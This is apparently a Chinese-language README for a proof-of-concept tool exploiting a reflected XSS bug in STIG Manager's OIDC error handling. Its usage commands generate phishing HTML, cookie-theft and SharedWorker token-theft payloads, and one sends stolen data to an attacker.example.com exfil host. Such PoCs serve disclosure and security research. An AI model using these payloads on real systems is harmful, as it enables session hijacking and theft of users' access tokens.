针对 STIG Manager 1.5.10 至 1.6.7 版本中反射型跨站脚本(XSS)漏洞的概念性 PoC。
STIG Manager Web 应用 OIDC 认证错误处理代码中存在一个反射型 XSS 漏洞。OIDC 提供商返回的 error 和 error_description 查询参数通过 innerHTML 直接写入 DOM,未进行 HTML 转义。攻击者若能构造恶意 URL 并诱使用户点击,即可在应用上下文中执行任意 JavaScript。
当目标用户在另一个浏览器标签页中拥有活动的 STIG Manager 会话时,该漏洞最为严重——注入的代码可与管理访问令牌的 SharedWorker 通信,从而以受害者身份发起经认证的 API 请求。
# Generate a malicious callback URL (SharedWorker token theft mode)
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker
# Generate a simple cookie theft payload
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple
# Output as phishing HTML
python3 cve-2026-41200-poc.py --format html
# Custom API and exfil hosts
python3 cve-2026-41200-poc.py \
-c https://stig-manager.example.com/auth/callback \
-a https://stig-manager.example.com \
-e https://attacker.example.com
本工具仅用于教育目的和经授权的安全研究。